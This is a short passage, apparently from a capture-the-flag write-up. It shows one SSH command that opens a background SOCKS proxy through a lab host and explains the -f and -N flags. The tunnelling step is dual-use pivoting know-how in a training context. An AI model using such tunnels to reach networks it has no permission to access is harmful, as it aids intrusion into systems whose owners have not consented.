$ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa -fN -D 4321
```
- `-f`: ssh in background
- `-N`: do not execute a remote command